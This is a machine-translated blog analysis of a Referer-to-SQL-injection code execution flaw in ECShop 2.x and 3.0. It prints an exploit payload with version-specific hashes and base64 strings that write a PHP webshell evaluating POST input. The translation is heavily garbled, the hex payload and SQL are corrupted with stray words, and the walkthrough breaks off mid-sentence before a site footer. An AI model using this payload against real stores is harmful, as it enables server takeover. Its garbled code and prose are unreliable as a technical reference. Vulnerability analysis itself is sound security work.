Shulou(Shulou.com)05/31 Report--

Today, I will talk to you about how to analyze ECShop 2.x 3.0 code execution vulnerabilities, which may not be well understood by many people. In order to make you understand better, the editor has summarized the following contents for you. I hope you can get something according to this article.

Preface of 0x00

ECShop is a B2C independent online store system, which is suitable for enterprises and individuals to quickly build personalized online stores. There are code execution vulnerabilities in version 2.x and version 3.0.

Principle of 0x01 vulnerability

ECShop does not validate the $GLOBAL ['_ SERVER'] ['HTTP_REFERER'] variable, so that the user can insert arbitrary code into the user_passport.dwt template, and then insert_mod dynamically executes the corresponding function according to the content of the template. The user inserts malicious code to cause the template to dynamically execute the insert_ads method under lib_insert, and returns the constructed execution code through SQL injection, causing the fetch function of the cls_template template class to be called later. Malicious code was successfully executed.

0x02 environment building

IDE: PHPStorm

PHP: 5.4

ECshop 3.0

ECShop 2.7.3

Overall function of 0x03 analysis process

First of all, go through the overall function and enter into user.php.

Normally, the program assigns $GLOBALS ['_ SERVER'] ['HTTP_REFERER'] to $back_act, and then assigns and passes values to the user_passport.dwt page template through assign and display of the cls_template template class; at this point, the content of the user_passport.dwt page template looks like this.

Enter $smarty- > display, and then dynamically call the function to obtain shopping information and membership information through the division and reverse sequence of inser_mod. The two functions above user_passport.dw will be executed by default, that is, the insert_cart_info and insert_member_info functions under the lib_insert function class.

Insert_cart_info function / / call shopping information insert_member_info function / / call member information

User_passport.dw template:

Inser_mod function:

| Payload45ea207d7a2b68c49582d2d22adf953aads | Payload45ea207d7a2b68c49582d2d22adf953aads 2: {num "; sJuv 280:" * / union select 1Magic 0x272f2aMagic 34Jing 5jue 6B617373657274286261736345F6465636F6465285A6D6D6C735A563977645852693375644756756347687687A79776E50443977614841675A585A6862436B58314250326D5630704F79412F69706327293B2F2F7D787788710-- "sRent2:" sF2F778777A7A49776E503977614414841675A585A6862436B58314250326D5630704F79412F69706327293B2F2F7D77878810; "sF2:" / * "start the analysis}

When performing the login operation in user.php, change the value of $GLOBALS ['_ SERVER'] ['HTTP_REFERER'] to our code:

At this point, the value of $back_act is the REFERER value we tampered with, and then the program will continue to execute:

$smarty- > assign ('back_act', $back_act); / / assign $smarty- > display (' user_passport.dwt'); / / pass the value to the template

After the assignment and passing of assign,display, the back_ act value on the user_passport.dwt template looks like this:

When looking at the stack parameters, we can see that the value of this- > _ echash is the same as that of our Payload, which is the fixed hash value of ECSHOP. The _ echash value of version 2.7 is 554fcae493e564ee0dc75bdf2ebf94ca and the value of _ echash of version 3.x is 45ea207d7a2b68c49582d2d22adf953, so the Payload used is also different.

When you enter the display function, the fetch function is executed to get the page template content.

$out = $this- > fetch ($filename, $cache_id); / / get the template content, that is, the content of user_passport.dwt, according to $cache_id

Then split according to the value of _ echash, that is, a fixed hash value.

After the split, the program executes two default functions before executing our code and continuing to execute the insert_mod function.

$k [$key] = $this- > insert_mod ($val)

Following up, you can see that the string we entered is segmented according to "|" and assigned to $fun and $para, respectively.

So the final value is similar to $fun = insert_ads $para = array ('num'= > "* / union..." , 'id'= > "* /")

When it comes to return $fun ($para); here, the insert_ads ($para) function under the lib_insert dynamic function class will be executed.

Follow up, you can see that the SQL statement is executed here, and the parameters $arr ['id'] and $arr [' num'] are the contents of the array we passed in, and the parameters are controllable, resulting in the injection.

At this point in the database, the statement executed is:

SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.ad_width, p.ad_height, p.position_style, RAND () AS rnd FROM `ecshop3_ 0`.`ecs _ ad`AS a LEFT JOIN `ecshop3_ 0`.`ecs _ ad_ position`AS p ON a.position_id = p.position_id WHERE enabled = 1 AND start_time = '1536052713' AND a.position_id =' / * 'ORDER BY rnd LIMIT * / union select 1Magol 0x272f2a 5There are 0xB24617364275D3B617373642862636536345F6465636F6465285A6C735A567765266592397567567564484DF4A49756347687774A79776E50447761484A79776A6862436B583145531526D5445784D5630704F794F79702729293B2F2F7D78778

You can see that the position_id and position_style fields of the database are overwritten by the union select query as'/ * and {$asd']; assert (base64_decode ('ZmlsZV9wdXRfY29udGVudHMoJzIucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTExMV0pOyA/Picp')); / /} xxx

After the query finishes, the fetch function of the cls_template template class is executed based on the value of $position_style.

$val = $GLOBALS ['smarty']-> fetch ($position_style); / / executed the fetch function of smarty

Follow up, see here, where the malicious code is finally executed.

$out = $this- > _ eval ($this- > fetch_str (substr ($filename, 4); / / the statement was finally executed

Taking a look at the internal string processing, the value passed in filename is:

"str: {$asd']; assert (base64_decode ('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA/Picp')); / /} xxx"

Then use substr to cut the filenname, and then go to $this- > fetch_str. You can see that the return of the fetch_str function is

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.